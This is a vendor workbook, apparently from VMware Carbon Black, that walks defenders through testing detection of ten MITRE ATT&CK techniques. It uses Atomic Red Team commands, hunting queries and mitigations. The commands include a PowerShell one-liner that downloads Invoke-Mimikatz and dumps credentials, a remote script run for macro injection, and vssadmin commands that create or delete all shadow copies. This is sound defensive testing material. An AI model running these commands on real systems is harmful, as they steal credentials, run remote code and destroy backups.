MITRE Evaluation Workbook

Introduction      

Each year MITRE Engenuity evaluates cybersecurity products using an open methodology based on the ATT&CK® knowledge base. MITRE Engenuity’s rigorous testing reflects the type of threats that our customers are seeing in the real world, where there are no redos.

This workbook is intended to serve as a starting point for mapping your security solution to the MITRE ATT&CK framework, with a focus on the techniques used in the MITRE Engenuity ATT&CK® Evaluation, thus enabling the Cyber Defender community to understand adversaries and improve their organization’s security posture. Throughout this guide, you will notice the specific references to the VMware Carbon Black Cloud (CBC) toolset.

We would like to credit and thank Red Canary for their excellent work on curating content specifically on MITRE ATT&CK, which is referenced throughout this guide:                                                                            

  • Red Canary’s Threat Detection Report was utilized to pinpoint the top 10 TIDs by prevalence. Full Report Here
  • Red Canary’s ATOMIC Tests are utilized for quick and easy tests to verify TID coverage. More on the ATOMIC Red Team here

What is MITRE ATT&CK?

A screenshot of a computer</p>
<p>Description automatically generated with medium confidence

MITRE ATT&CK® is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”

What are the MITRE Engenuity Evaluations?

A picture containing company nameDescription automatically generatedSince MITRE introduced MITRE ATT&CK® in May 2015, the practitioner community has come to rely on it to enable better communications and management around cybersecurity. MITRE Engenuity ATT&CK® Evaluations provide vendors with an assessment of their ability to defend against specific adversary tactics and techniques. MITRE Engenuity Evaluations emulate known adversary behaviors to ensure the evaluation is threat-informed, and carefully select adversaries that allow evaluation of common ATT&CK techniques, as well as push the market to more effectively secure the world’s networks. The results of the Evaluations are openly published to provide industry end-users of these cybersecurity products with the information they need to make good decisions about what is best for their organizations.

What Adversaries were Tested in the most recent MITRE Engenuity Evaluation?

This year’s testing emulated two sophisticated adversaries across both Windows and Linux systems, Wizard Spider, a financially motivated cybercriminal group, and Sandworm, a destructive threat group that the U.S. and U.K. have attributed to Russia.

For more information on Wizard Spider and Sandworm, please refer to MITRE Engenuity’s full overview and VMware Carbon Black User Exchange for real-time intelligence on threat actors.

Getting Started with MITRE ATT&CK

In order to get your organization started with MITRE ATT&CK it is important to narrow your initial focus to the area of greatest impact. For the purpose of the workbook as stated above we have selected 10 techniques that were both leveraged in the most recent MITRE Engenuity Evaluation and appear in the list of the most frequently observed adversarial techniques. Note you can replicate this procedure with your choice of any 10 techniques most relevant to your organization.

Testing Methodology

This workbook will break down each Technique ID (TID) using 3 steps:

Step 1: Test Technique

For the purpose of this workbook, we will leverage Red Canary’s Atomic Tests to quickly validate coverage requiring minimal to no setup. The Atomic Tests are developed and maintained by Red Canary to create an open-source library of simple tests that every security team can execute to test your environmental controls. Tests are focused and are defined in a structured format that can be used by automation frameworks.

Note: the screenshots in this workbook are taken directly from the MITRE Engenuity Evaluation for you to understand VMware’s coverage. Your screenshots will likely differ from the results shown in the workbook.

Step 2: Validate Coverage

MITRE ATT&CK was designed to categorize adversarial techniques and highlight visibility gaps in your security controls. Not all techniques are directly indicative of malicious activity so in this step, we will want to determine if you have the appropriate level of telemetry to either create an alert or correlate with additional steps to drive actionable alerts and outcomes.

​​​​​​​​​​​​​​Can you prevent it?

While these techniques are commonly utilized by adversaries, they may also be necessary for legitimate day-to-day administration. This step will help identify ways to use VMware Carbon Black Cloud to reduce the attack surface through a combination of enhanced visibility, detection, and prevention.

When implementing prevention on TID ensure you can identify potential false positives that may occur to eliminate organizational friction. MITRE built the ATT&CK framework as a detection resource. Prevention does not always match one-to-one.

 

Execution

T1059 Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. Most systems have a built-in command-line interface, for example, windows installs include PowerShell and Windows Command Shell.

Based on the latest MITRE ATT&CK Evaluation there were two sub techniques within T1059 that were observed in both adversarial campaigns: PowerShell T1059.001, and Windows Command Shell T1059.003.

 

T1059.001 PowerShell

Why T1059.001 Matters: PowerShell is included in the Windows operating system and can be leveraged by administrators and adversaries alike. Administrator permissions are required to use PowerShell to connect to remote systems; PowerShell provides full Windows API access and PowerShell can be executed from disk or in memory which makes it easy to evade common defenses.

How can T1059.001 be leveraged:

  • Direct execution of a local script or DLLs
  • Hide malicious activity using the Encoded command switch
  • Downloading and executing remote resources using various network protocols
  • Loading PowerShell into other processes

Step 1: Test Technique

Atomic Test

Instructions

T1059.001 Atomic Test – Mimikatz

Run with command prompt (CMD)

powershell.exe "IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

 What is gained if successful? Mimikatz is a post-exploitation tool designed to dump passwords, hashes, PINs, and Kerberos tickets from memory. If an adversary is successful they will have access to credentials to elevate privileges and/ or move laterally through the network.

For more T1059 tests visit Atomic Test

Step 2: Validate Coverage

Once the test above or another variation it is important to verify your coverage. Did you get an alert? Do you have telemetry? Within VMware Carbon Black Cloud you can review your alerts and telemetry through the alerts page. Based on the most recent MITRE Wizard Spider + Sandworm testing where T1059.001 was emulated you will be able to see the screenshots of the activity below.

In this particular alert VMware Carbon Black identifies malicious usage of wmiprvse.exe to spawn powershell.exe, powershell.exe then is seen executing subsequent actions. This detection was based on our out-of-the-box indicators of compromise (IOCs).

Graphical user interface, application</p>
<p>Description automatically generated

Will this alert cause false positives?

Not all TIDs are created equal. Alerting on T1059.001 in isolation will create a lot of noise which can disrupt your security team. In the MITRE Evaluations, you will often see alerts surfacing on all TIDs and configuration being tuned to Extra Aggressive, the challenge is that this is not a production viable option. In production you need to balance alerting vs context while not at the expense of alert efficacy.

To understand how PowerShell is leveraged within your organization in the VMware Carbon Black Cloud go to Investigate and query for the following:

ttp:MITRE_T1059_001_POWERSHELL 

Graphical user interface, text, application, email</p>
<p>Description automatically generated

Review the results and modify your existing alert to focus on the anomalous activity in your environment.

Step 3: Implement Mitigations

As PowerShell and other CMD interpreters are trusted applications we need to be prescriptive in reducing the attack surface that exists for this portion of the exercise beyond VMware Carbon Black being able to block anomalous behaviors.

Questions for Consideration:

  • Do you currently enforce restrictions on how PowerShell can be leveraged in your organization today?
  • Do you provide admin rights across your organization?
  • Should all administrators have access to PowerShell?
  • How is PowerShell currently controlled and monitored for these power users?

Can you block it?

Yes, but it is likely that there are several applications and users within your organization that will need access to PowerShell to function. In your endpoint security solution, determine how PowerShell is being utilized in your organization today and what the ramifications would be if you created a block rule.

Graphical user interface, text, application, email</p>
<p>Description automatically generated

In VMware Carbon Black Endpoint Standard we provide administrators the ability to test each operation and adjust the ruleset accordingly prior to implementation to ensure administrators are able to operate more confidently.

T1059.003 Windows Command Shell

Why T1059.003 matters: Windows Command Shell (CMD) is the built-in, primary command-line interpreter (CLI) across every version of Windows. CMD can be used to control almost any aspect of a system and so is one of the primary ways that adversaries interact with compromised systems. Using CMD, adversaries can execute various commands, scripts, and payloads.

How can Technique be leveraged:

•         Create and execute batch scripts

•         Obfuscate malicious activity to evade detection

•         Collect and/or modify System Information

•         Execute binaries

Step 1: Test Technique

Atomic Test

Instructions

T1059.003 Atomic Test - Writes text to a file and displays it

Run with command prompt

echo Hello from the Windows Command Prompt! > %TEMP%\test.bin & type %TEMP%\test.bin

This test writes text to a file and display the results. It is intended to emulate the dropping of a malicious file to a disk.

What is gained if successful? A malicious file is dropped to disk and is run successfully, comprising the environment. This could lead to encryption of your system, adversarial persistence, lateral movement, and in some cases extortion.

For more T1059 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. It shows how winword.exe is used to invoke CMD.exe to execute a malicious script – adb.vbs.

Graphical user interface</p>
<p>Description automatically generated

Will this alert cause false positives?

Similar to PowerShell, alerting on CMD in isolation will create a lot of noise. If leveraging the atomic test note, there is no malicious nature to this activity. It is important to determine If this is the case in your environment, and search for the technique using its TTP.

ttp:MITRE_T1059_003_WIN_CMD_SHELL

Graphical user interface, text, application</p>
<p>Description automatically generated

Step 2: Implement Mitigations

As with PowerShell, CMD is a trusted application we need to be prescriptive in reducing the attack surface that exists for this portion of the exercise we will want to baseline CMD usage.

Questions for Consideration:

•         Do you currently enforce restrictions on how CMD can be leveraged in your organization today?

•         Do you provide admin rights in your organization?

•         Should all of these administrators have access to CMD?

•         How is CMD currently controlled and monitored for these power users?

Can you block it?

Yes, in the example above from the Mitre Wizard Spider + Sandworm testing, we can control whether winword.exe is allowed to invoke a command interpreter. This is in our out-of-the-box policy, so no additional tuning is required to cover this technique.

Graphical user interface, text, application</p>
<p>Description automatically generated

T1047 Windows Management Instrumentation

Why does T1047 matter? Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components.

How can Technique be leveraged:

         Move laterally and execute remote payloads

         Use WMI to gather system information

         Modify systems, for example deleting shadow copies

Step 1: Test Technique

Atomic Test

Instructions

T1047 Atomic Test - Use WMI to list all local User Accounts on a machine.

In command prompt:

wmic useraccount get /ALL /format:csv

What is gained if successful? All local user accounts details will be listed in the command prompt.

For more T1047 tests visit Atomic Test

Step 2: Validate Coverage, Identify gaps

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. In CBC, we have multiple IOC hits and log entries showing WMI being used to run a malicious process. These actions were detected using our out-of-the-box IOC and we gained greater visibility into the fileless script content using our AMSI telemetry.

Graphical user interface, application</p>
<p>Description automatically generated

Will this alert cause a false positive?

All WMI usage should be monitored and investigated. If the data flow is common, create exceptions in IOCs.

Shadow Copy Deletion by WMIC Or VSSAdmin

(((process_CMDline:vssadmin.exe OR process_CMDline:vssadmin) AND process_CMDline:shadows process_CMDline:delete) OR ((process_CMDline:wmic OR process_CMDline:wmic.exe) AND process_CMDline:shadowcopy process_CMDline:delete))

System Recon And Discovery using WMI

(((process_CMDline:wmic* OR process_name:wmic.exe) (process_CMDline:group OR process_CMDline:useraccount OR process_CMDline:ntdomain OR process_CMDline:process OR process_CMDline:service OR process_CMDline:qfe OR process_CMDline:startup OR process_CMDline:share OR process_CMDline:password)))

WMI Process Create Execution

(process_name:wmic.exe process_CMDline:"process\ call\ create")

Step 3: Implement Mitigations

WMI traffic is commonly encrypted, so it will blend in with other network traffic and could generate high volumes of false negatives. This is yet another reason for why adversaries love WMI.

Can you block it?

Yes, we can block complete use of wmic.exe, but as stated previously, it is recommended to hunt for this traffic and alert effectively rather than block due to its known good uses.

Privilege Escalation

T1055 Process Injection

Why does T1055 matter? Process Injection is a technique that adversaries use to disguise their malicious activity as legitimate operations and abuse privileges of the legitimate processes. As execution is masked under a legitimate process and used to evade detection from the security team.

How can Technique be leveraged:

         Inject malicious code in known good processes

Step 1: Test Technique

Atomic Test

Instructions

T1055 Atomic Test - Inject Metasploit created shellcode into a newly created process and execute.

Note: Requires an installation of office.

Run the below in PowerShell:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)

Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"

What is gained if successful? Word will attempt to run malicious code which can lead to infrastructure compromise.

For more T1055 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. In CBC, we can see that ryuk.exe tries to inject code into notepad.exe. This behavior has been highlighted with our TID TTPs.

A screenshot of a computer</p>
<p>Description automatically generated with medium confidence

Graphical user interface, application</p>
<p>Description automatically generated

Will this alert cause a false positive?

Many tools in Windows use process injection legitimately for debugging and virtualization to help identify malicious activity, we need to focus on unusual source processes, such as Microsoft Office products and tools that commonly deliver first-stage malware-like scripts.

Looking for unusual behavior from Word, such as spawning a shell or running a process out of AppData

((parent_name:winword.exe (process_name:CMD.exe OR process_name:cscript.exe OR process_name:wscript.exe OR process_name:powershell.exe OR process_name:appdata\\*)))

Step 3: Implement Mitigations

Many tools in Windows use process injection legitimately, so baselining will be required before implementing blocks.

Can you block it? Yes, create a prevention rule for processes that should be blocked from injecting code.

Graphical user interface, text, application, email</p>
<p>Description automatically generated

Defense Evasion

T1218 Signed Binary Proxy Execution

Adversaries may bypass the process and/or signature-based defenses by proxying the execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Rundl.exe is a commonly targeted program for proxy execution.

Why does rundll32 matter?  The rundll32 .exe is a program that can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy the execution of code to avoid triggering security alerts because of allowlists or false positives due to Windows using rundll32 .exe for normal operations.

How can Technique be leveraged:

         Execute malicious DLLs

         Use existing, legitimate DLLs to perform malicious actions

Step 1: Test Technique

Atomic Test

Instructions

T1218.011 Atomic Test - Rundll32 with Control_RunDLL

Download DLL

Run using CMD

rundll32.exe shell32.dll,Control_RunDLL c:\PathToAtomicsFolder\T1047\bin\calc.dll

 

What is gained if successful? In the above test, we are loading a DLL using control_rundll (control panel). If an adversary is successful, they will have the ability to load and execute a malicious DLL’s.

For more T1218.011 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. It shows how VMware Carbon Black Cloud saw the unusual DLL load using Control_RunDLL. We can see that adb.dll was loaded using rundll32.exe and that this action was detected using our out-of-the-box IOCs.

A screenshot of a computer</p>
<p>Description automatically generated

Will this alert cause a false positive?

Alerting on rundll.exe as an application could create a lot of noise, with the alert triggered. If this is the case in your environment, search for the technique in our investigation page using its behavior, process name is rundll32.exe with CMDline containing control_rundll.

(process_name:rundll32.exe process_CMDline:control_RunDLL)

Review the results and modify your existing alert to exclude the ‘normal activity' in your environment.

Step 3: Implement Mitigations

As rundll is a trusted application we need to be prescriptive in reducing the attack surface that exists for this portion of the exercise we will want to monitor rundll usage.

Can you block it?

It depends, Rundll32 is a common and trusted execution library blocking execution outright can lead to large scale organizational disruption.

For customers of VMware Carbon Black the VMware Threat Research team ensures that protection is enforced out-of-the-box against malicious usage and continues to evolve as the adversaries do. Rundll32 and other high confidence malicious behaviors are blocked with our Zero-Touch Prevention capabilities which update with zero interactions from you or your team.

Credential Access

T1003 Credential Dumping

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. With the correct credentials, adversaries can elevate privileges and to move laterally to other targets, and access restricted information. Several of the tools mentioned in this technique may be used by both adversaries and security testers. Additional custom tools likely exist as well.

Note: credentials are so valuable that, sometimes, acquiring them is the entire goal of an attack.

In this test, we will focus on T1003.003 – OS Credential Dumping: NTDS

Why Does T1003.003 matter? Adversaries may attempt to access or copy the Active Directory domain database to steal credentials and other domain information such as devices, users, and access rights. The NTDS file (NTDS.dit) is typically located in the %SystemRoot%\NTDS\ directory of a domain controller.

In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.

How can Technique be leveraged:

         Accessing hashed credentials

         Accessing credentials in plaintext

Step 1: Test Technique

Atomic Test

Instructions

T1003.003 Atomic Test - Create Volume Shadow Copy with vssadmin

Run below command in an elevated prompt:

Vssadmin.exe create shadow /for=c:

What is gained if successful? If successful, the adversary will have created a shadow copy, which can be used to dump the NTDS.dit file. Dumping the credentials from NTDS will provide access to your Active Directory database and passwords.

For more T1003.003 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. It shows how CBC saw vssadmin being spawned suspiciously and that the CMDline shows that vssadmin was being used to create a shadow copy of c:\. These actions were detected using our out-of-the-box IOCs.

A screenshot of a computer</p>
<p>Description automatically generated

Graphical user interface</p>
<p>Description automatically generated

Will this alert cause a false positive?

There are backup solutions that use vssadmin to create backups of systems. To drive high fidelity alerts exclusions are likely needed. Within CBC pivot to Investigate and run the following query:

(process_CMDline:HarddiskVolumeShadowCopy* AND (process_CMDline:ntds\\ntds.dit OR process_CMDline:system32\\config\\sam OR process_CMDline:system32\\config\\system))

Sort to Applications to determine applications of common use.

Graphical user interface, text, application</p>
<p>Description automatically generated

Update the query accordingly and save and alert on this updated IOC.

The below example excludes Veritas:

((process_CMDline:HarddiskVolumeShadowCopy* AND (process_CMDline:ntds\\ntds.dit OR process_CMDline:system32\\config\\sam OR process_CMDline:system32\\config\\system)) -(process_name:windows\\system32\\esentutl.exe OR process_publisher:"Veritas\ Technologies\ LLC" OR process_publisher:"Symantec\ Corporation"))

Step 3: Identify and Implement Mitigations

Mitigation for credential dumping requires the use of best practices around user access.

         Encrypt sensitive Information - Secure the Domain controller backups

         Password policies - Ensure local admin account passwords are complex and unique

         Privileged account management - Limit privileged account use across admin tiers.

         User Training - Train users on password best practices.

Can you block it?

Yes, Credentials are so valuable that, sometimes, acquiring them is the entire goal of an attack. It would be imperative to restrict credential dumping activity when observed in your organization. For VMware Carbon Black Cloud, credential theft protection is built in out-of-the-box for administrators with our Zero-Touch Prevention capabilities.

Graphical user interface, text, application</p>
<p>Description automatically generated

If you are looking to assess the hygiene of your organization navigate to the Live Query tab within the VMware Carbon Black console and try the following recommended queries:

Credential Theft Hardening - LSASS

Description: In Windows 8, 10, and 2012 R2 operating systems, credential theft tools (such as Mimikatz, and Bloodhound) can extract passwords and hashes from the Local Security Authority Server Service (LSASS) process if it is not protected by enabling the RunAsPPL registry key. Learn more: https://attack.mitre.org/techniques/T1003/

Results: Query returns DISABLED if the target system has RunAsPPL disabled. CBCrecommends deploying this IT Hygiene policy via GPO to protect against credential theft. If no results are returned, the machine has this credential theft mitigation in place.

Credential Theft Hardening - WDigest

Description: On Windows XP and later operating systems, credential theft tools (such as Mimikatz) can access the WDigest protocol that sends plain text credentials to certain applications. By default, Windows stores these credentials in the lsass.exe process for user convenience. This protocol should be disabled. Learn more: https://attack.mitre.org/techniques/T1003/

Results: Lists 0 for all systems that have UseLogonCredential disabled. If no results are returned, CBC recommends deploying this IT Hygiene policy via GPO to protect against credential theft. If results are 1 for Windows 10 or Windows 2016, CB recommends conducting an immediate investigation.

Discovery

T1082 System Information Discovery

Why Does T1082 matter? An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries can then use this information for number of reasons, for instance to deliver the exact malware for the given environment.

How can Technique be leveraged:

         System information discovery

Step 1: Test Technique

Atomic Test

Instructions

T1082 - Atomic Test - System Information Discovery

In the command prompt, run the below:

 

systeminfo

reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

 

 

What is gained if successful? Upon execution, system info and time info will be displayed.

For more T1082 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the MITRE Wizard Spider + Sandworm testing. In CBC, we can see that CMD is used to run systeminfo. We have visibility into the CMDline, which shows the results being written to discovery.txt and then into temp.txt. Once CMD carries out the command, it terminates. This behavior is also highlighted with our reports.

A picture containing diagram</p>
<p>Description automatically generated

Will this alert cause a false positive?

System auditing tools will use commands similar to the above. We can exclude the parent process that initiates the command. The above CMD is initiated from uxtheme.exe, which is not a known auditing tool.

The below query looks for all systeminfo, and other discovery commands, not originally initiated from an IT asset tool.

(((childproc_name:net.exe OR childproc_name:nbstat.exe OR childproc_name:ipconfig.exe) AND childproc_name:systeminfo.exe AND -parent_name:SolarWinds.Collector.Service.exe))

Step 3: Implement Mitigations

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Whilst we cannot block access without restricting genuine usage of these tools. CBC has built-in IOCs that will provide visibility and alerting to when suspicious activity is suspected.

T1016 System Network Configuration Discovery

Why does T016 matter? Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. This is used to deliver malware or laterally move through the network.

How can Technique be leveraged:

         Network information discovery

Step 1: Test Technique

Atomic Test

Instructions

T1016 Atomic Test - System Network Configuration Discovery on Windows

In command line, run the below commands:

 

ipconfig /all

netsh interface show interface

arp -a

nbtstat -n

net config

 

What is gained if successful? Upon successful execution, CMD.exe will spawn multiple commands to list network configuration settings.

For more T1016 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. In VMware Carbon Black Cloud, we can see that CMD is used to run ipconfig /all. This behavior is also highlighted in our reports.

Graphical user interface</p>
<p>Description automatically generated

Will this alert cause a false positive?

System auditing tools will use commands similar to the above. We can exclude the parent process that initiates the command. The above CMD is initiated from uxtheme.exe, which is not a known auditing tool.

The below query looks for ipconfig commands, not originally initiated from an IT asset tool.

childproc_name:ipconfig.exe -parent_name:SolarWinds.Collector.Service.exe

Step 3: Identify and Implement Mitigations

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Whilst we cannot block access without restricting genuine usage of these tools. CBC has built in IOCs that will provide visibility and alerting to when suspicious activity is suspected.

Command and Control

T1105 Ingress Tool Transfer

Why does T1105 matter? Adversaries may transfer external tools or malicious files through the command and control channel or through alternate protocols with another tool such as FTP.

Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

How can Technique be leveraged:

         Deploy binaries from a command and control server to victim machine

         Laterally move across the estate

         Set up and maintain a foothold in an organization's network

Step 1: Test Technique

Atomic Test

Instructions

T1105 Atomic Test - Using PowerShell, download and write a file from the internet.

In PowerShell, run the below command:

 

(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt

 

What is gained if successful? If the above is successful, the adversary has managed to get a file from a remote server and write it to a disk. If the file is malicious, they have managed to write a malicious file to disk. Usually, this technique is useful when an attacker is trying to bring malicious software or program which can be used to help advance an attack.

For more T1105 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. The screenshots include both CBC and NSX. NSX is VMware's Firewall, which can be used to detect and stop threats inside your network. It shows how NSX has the visibility of the connection over 8080 from winword.exe. You can see that a GET was used to fetch adb.txt. In CBC, we have multiple IOC hits and log entries showing the file being written. These actions were detected using our out-of-the-box IOCs.

Graphical user interface, application</p>
<p>Description automatically generated

A screenshot of a computer</p>
<p>Description automatically generated with medium confidence

Will this alert cause a false positive?

All ingress tool transfers should be investigated. If the data flow is common, create exceptions in IOCs.

Below query searches for suspicious PowerShell commands:

process_CMDline:powershell* AND (process_CMDline:.downloaddata OR process_CMDline:.downloadstring OR process_CMDline:.downloadfile)

To search for certutil downloading malicious binaries:

((process_name:certutil.exe OR process_original_filename:certutil.exe) process_CMDline:"\-urlcache")

To search for BITSAdmin downloading malicious files

((process_name:bitsadmin.exe AND (process_CMDline:\/transfer OR process_CMDline:\/create OR process_CMDline:\/download OR process_CMDline:\/addfile OR process_CMDline:\/setnotifyCMDline OR process_CMDline:\/complete)))

Step 3: Identify and Implement Mitigations

Since the rules mentioned above and other well known tools used for ingress tool transfer are legitimate tools we need to baseline the usage. Using watchlists, the Investigation page, LiveQuery and/or LiveResponse, baselining usage is achievable in CBC. Once the legitimate use cases are known, you can focus on the suspicious behavior.

Can you block it? Yes, using policies to control what processes are allowed network connections will limit the attack surface. Using NSX IPS/IDS feature, we can identify and alert on adversarial malware or unusual data transfer.

Impact

T1490 – Inhibit System Recovery

Why does T1490 matter? Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system. Utilities such as vssadmin, wmi, wbadmin and bcdedit can be used by adversaries to disable or delete system recovery features.

How can Technique be leveraged:

         Delete shadow copies

         Delete backup catalogs

         Modify boot records

Step 1: Test Technique

Atomic Test

Instructions

T1490 Atomic Test - Windows - Delete Volume Shadow Copies

Run the below command in an elevated prompt

 

vssadmin.exe delete shadows /all /quiet

 

What is gained if successful? All shadow copies are deleted on the window system, therefore, inhibiting rollback.

For more T1490 tests visit Atomic Test

Step 2: Validate Coverage

The below screenshots are from the Mitre Wizard Spider + Sandworm testing. In VMware Carbon Black Cloud, we can see the PowerShell is used to invoke vssadmin which is used to delete all shadow copies quietly. This behavior is also highlighted in our reports.

Graphical user interface, text</p>
<p>Description automatically generated

Will this alert cause a false positive? There are backup solutions that use vssadmin legitimately to manage backups of systems. To drive high fidelity alerts exclusions are likely needed. Use user or publisher exclusions.

Within CBC Cloud pivot to Investigate and run the following query:

(((process_CMDline:vssadmin.exe OR process_CMDline:vssadmin) AND process_CMDline:shadows process_CMDline:delete process_CMDline:\/quiet) OR ((process_CMDline:wmic OR process_CMDline:wmic.exe) AND process_CMDline:shadowcopy process_CMDline:delete) -process_username:bob -process_publisher:"Symantec\ Corporation")

This query alerts on shadow volume copies being deleted using vssadmin or wmic via the command line.

Step 3: Identify and Implement Mitigations

Volume shadow copies, back up catalogs and boot records need to be protected and visibility/alerting for suspicious activity is required, this is available out-of-the-box with VMware Carbon Black.

Beyond protection, it is imperative to explore disaster recovery tools that store backups in a secure offline manner to ensure no tampering has occurred.

Summary and Additional Resources

This workbook is intended to serve as a starting point for mapping your security solution to the MITRE ATT&CK framework, with a focus on the techniques used in the MITRE Engenuity ATT&CK® Evaluation, thus enabling the Cyber Defender community to understand adversaries and improve their organization’s security posture. Throughout this guide, you will notice the specific references to the VMware Carbon Black Cloud (CBC) toolset.

Additional Resources

Change Log

The following updates were made to this guide:

Date

Description of Changes

6 June 2022

  • Initial publication.

Feedback

Your feedback is valuable.

To comment on this paper, contact VMware Carbon Black Technical Marketing techzone-sbu@vmware.com.

Authors and Contributors

Raj Sahota, Senior Technical Marketing Architect, Network and Advanced Security Business Group, VMware

Filter Tags

Empowering the Modern SOC Carbon Black Cloud Endpoint Standard Audit and Remediation Enterprise EDR Document Proof Of Concept Advanced Evaluate MITRE